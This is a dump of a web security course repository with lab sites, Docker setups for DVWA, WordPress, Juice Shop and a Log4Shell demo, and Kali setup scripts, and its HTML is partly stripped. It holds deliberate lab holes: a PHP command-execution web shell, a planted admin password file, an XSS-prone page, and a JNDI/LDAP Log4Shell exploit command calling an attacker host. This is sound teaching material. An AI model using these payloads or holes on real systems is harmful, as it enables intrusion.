On many sites, the About page can provide
important insights about the target, including potential
usernames or even password guesses!
The Contact page can provide login info, and may in fact be an
attack vector, depending on what the contact form does.
In this lab, you need to use ZAP to spider this tiny site and discover the attached pages and assets.
But beware: spidering is not all you need to do. There's a secret page that you'll have to find by fuzzing!
================================================ FILE: 2-10_zap-lab/site/index.js ================================================ // Just because it isn't HTML doesn't mean you can ignore the file! // // If you haven't found it yet, try looking for test.html ================================================ FILE: 2-10_zap-lab/site/links.html ================================================Fuzzing is a bit of an art form, but there are lots of tools to help.
I always keep a copy of Daniel Miessler's SecLists handy for enumeration of all kinds.
================================================ FILE: 2-10_zap-lab/site/pw_backup.txt ================================================ # Backup password for site admin: admin:passw0rd!! ================================================ FILE: 2-10_zap-lab/site/secret.html ================================================Congrats! You found the secret page!
================================================ FILE: 2-4_web-trinity/index.css ================================================ body { background: #202020; color: white; font-size: 24px; font-family: sans-serif; } h1 { color: cyan; } h1.toggled { color: magenta; } ================================================ FILE: 2-4_web-trinity/index.html ================================================This page demonstrates the interaction between HTML, JavaScript, and CSS.
================================================ FILE: 2-4_web-trinity/index.js ================================================ // Capture the toggle button and save it in a variable let toggleButton = document.getElementById("title-toggle"); // Add an EventListener that determines what happens // when we click on the button toggleButton.addEventListener("click", () => { // We capture the h1 header by its id let title = document.getElementById("hello-world"); // And on each click, toggle the presence of the 'toggled' class // Because our CSS has specific styling for the class, // the title will change color when the class is present. title.classList.toggle("toggled"); }) ================================================ FILE: 2-5_html/index.css ================================================ body { background: #202020; color: white; font-size: 24px; font-family: sans-serif; } h1 { color: cyan; } h1.toggled { color: magenta; } ================================================ FILE: 2-5_html/index.html ================================================This page goes into more detail about HTML.
The button below uses an onclick attribute to determine its behavior.
This page goes into more detail about CSS.
This paragraph and the one before it are styled based on class.
This paragraph, lacking the info class, looks different.
This paragraph is inheriting its color from the rules for the special class.
This page goes into more detail about JavaScript.
Below is a set of sliders, and a div element.
The div's color is set by the 3 sliders, which
correspond to Red, Green, and Blue values.
This adjustment is handled by the JavaScript linked
to this page.
In this lab, your objective is to make a button that triggers an alert() when clicked.
There are many ways to accomplish this: inline code, script tags in the HTML, or using the attached index.js. It's up to you!
This may look like an ordinary HTML page, but it has PHP code.
Use a text editor to change these names, then reload the page!
"; foreach($names as $name) { echo "This may look like an ordinary HTML page, but it has PHP code.
Try adding a GET parameter to the end of the URL.
Adding ?msg=hello should change what you see on this page.
Bonus: This implmentation is vulnerable to a classic web exploit! See if you can figure it out.
msg maybe?"; } ?>
"; system($_POST["cmd"]); echo ""; } else { echo "..."; } ?> ================================================ FILE: 3-2_php-lab/run.sh ================================================ #!/bin/bash docker container run --rm -d -p 8000:80 --name 3-2_php-lab -v $(pwd):/var/www/html php:8.1-apache ================================================ FILE: 3-4_lab-wordpress/docker-compose.yml ================================================ version: "3.9" services: db: image: mysql:5.7 volumes: - db_data:/var/lib/mysql restart: always environment: MYSQL_ROOT_PASSWORD: somewordpress MYSQL_DATABASE: wordpress MYSQL_USER: wordpress MYSQL_PASSWORD: wordpress wordpress: depends_on: - db image: pwst_wordpress build: context: . dockerfile: ./wp-dockerfile volumes: - wordpress_data:/var/www/html ports: - "8000:80" restart: always environment: WORDPRESS_DB_HOST: db WORDPRESS_DB_USER: wordpress WORDPRESS_DB_PASSWORD: wordpress WORDPRESS_DB_NAME: wordpress volumes: db_data: {} wordpress_data: {} ================================================ FILE: 3-4_lab-wordpress/wp-dockerfile ================================================ FROM wordpress:latest RUN apt update && apt install -y default-mysql-client ================================================ FILE: 3-5_lab-dvwa/docker-compose.yml ================================================ version: "3.9" services: db: image: mysql:5.7 restart: always volumes: - db_data:/var/lib/mysql environment: MYSQL_ROOT_PASSWORD: damnvulnerable MYSQL_DATABASE: dvwa MYSQL_USER: dvwa MYSQL_PASSWORD: damnvulnerable dvwa: depends_on: - db image: cytopia/dvwa:php-8.0-0.1 volumes: - dvwa_data:/var/www/html ports: - "8001:80" restart: always environment: MYSQL_HOSTNAME: db MYSQL_USERNAME: root MYSQL_PASSWORD: damnvulnerable MYSQL_DATABASE: dvwa volumes: db_data: {} dvwa_data: {} ================================================ FILE: 4-9_lab-log4shell/run.sh ================================================ #!/bin/bash docker container run --name 4-9_log4shell --rm -d -p 8888:8080 korteke/log4shell-demo echo "Container running! Exploit with" echo curl -A \${jndi:ldap://kali-ip:1389/a} http://pwst-server:8888/ ================================================ FILE: 5-2_juice-shop/run.sh ================================================ #!/bin/bash docker container run -d -e NODE_ENV=unsafe --restart=on-failure --name juice_shop -p 8002:3000 bkimminich/juice-shop ================================================ FILE: README.md ================================================ # PWST Resources This repository contains resources for students taking the Taggart Institute course "Practical Webapp Security and Testing." ## Usage Code in the repo is used for lab setup and for specific lab exercises. It should be cloned onto both the Kali VM and the Ubuntu VM. To download this repo, in a Terminal, run: ```bashj git clone https://github.com/mttaggart/pwst-resources ``` You'll now have the `pwst-resources` folder in your home folder. ## Kali Setup To run the setup script, Run the following in a Terminal: ```bash cd ~/pwst-resources/kali-setup ./setup.sh ``` There will be a few points where you need to provide input to the script, but otherwise it should run smoothly. If you wish to use the optional fish shell that is configured, make sure you run the `chsh` command as listed at the end of the install script! ## Docker Setup This script is meant to be run on the Ubuntu server, **not** on the Kali VM! To run the setup script, Run the following in a Terminal: ```bash cd ~/pwst-resources/docker-setup ./setup.sh ``` After you're finished, log out of the server and log back in to use Docker without `sudo`. To test, run: ```bash docker container run hello-world ``` ================================================ FILE: docker-setup/setup.sh ================================================ #!/bin/bash # Install dependencies echo "Installing dependencies" sudo apt update sudo apt install -y \ ca-certificates curl gnupg lsb-release echo "Adding Docker source" curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - sudo add-apt-repository "https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" echo "Installing Docker Engine" sudo apt update && sudo apt install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin echo "Adding user to docker group" sudo gpasswd -a $USER docker echo "Docker is installed; log out and log in to run Docker without sudo!" ================================================ FILE: kali-setup/setup.sh ================================================ #!/bin/bash # Add Brave Browser Sources # Brave Browser echo "Setting up Brave sources" curl -s https://brave-browser-apt-release.s3.brave.com/brave-core.asc | sudo apt-key --keyring /etc/apt/trusted.gpg.d/brave-browser-release.gpg add - echo "deb [arch=amd64] https://brave-browser-apt-release.s3.brave.com/ stable main" | sudo tee /etc/apt/sources.list.d/brave-browser-release.list # Update and add necessary packages echo "Installing Packages" sudo apt update sudo apt install -y fish terminator gedit python3-pip brave-browser vim-gtk3 zaproxy # Install VSCode echo "Installing VSCode" curl -L "https://code.visualstudio.com/sha/download?build=stable&os=linux-deb-x64" -o code.deb sudo dpkg -i code.deb rm code.deb # Setup Rust and Rust tools echo "Installing Rust and Rust tools" curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ~/.cargo/bin/cargo install rustscan ~/.cargo/bin/cargo install feroxbuster # Setup fonts mkdir ~/Scripts cd ~/Scripts git clone https://github.com/danielmiessler/SecLists git clone https://github.com/powerline/fonts cd fonts chmod +x install.sh ./install.sh cd ~ # Setup Terminator mkdir ~/.config/terminator cp ./terminatorconfig ~/.config/terminator/config # Setup Shell curl -kL https://get.oh-my.fish | fish fish -c "omf install bobthefish && exit" echo "set -x PATH \$PATH $HOME/.cargo/bin" >> ~/.config/fish/config.fish echo "Setup is complete! If you wish to use fish, run:\nchsh -s /usr/bin/fish" ================================================ FILE: kali-setup/terminatorconfig ================================================ [global_config] enabled_plugins = LaunchpadCodeURLHandler, APTURLHandler, MavenPluginURLHandler, LaunchpadBugURLHandler title_transmit_bg_color = "#204a87" [keybindings] [layouts] [[default]] [[[child1]]] parent = window0 type = Terminal [[[window0]]] parent = "" type = Window [plugins] [profiles] [[default]] background_darkness = 0.8 font = Source Code Pro for Powerline 11 background_type = transparent cursor_color = "#aaaaaa" scrollbar_position = hidden [[Future]] background_darkness = 0.8 background_type = transparent cursor_color = "#aaaaaa" font = Unispace 11 foreground_color = "#0064fa" scrollbar_position = hidden use_system_font = False [[High Contrast]] background_color = "#ffffff" cursor_color = "#aaaaaa" foreground_color = "#000000" [[Streaming]] background_color = "#0e0e0e" cursor_color = "#aaaaaa" foreground_color = "#d3d7cf" palette = "#000000:#cc0000:#4e9a06:#c4a000:#3465a4:#75507b:#06989a:#d3d7cf:#555753:#ef2929:#8ae234:#fce94f:#729fcf:#ad7fa8:#34e2e2:#eeeeec" scrollbar_position = hidden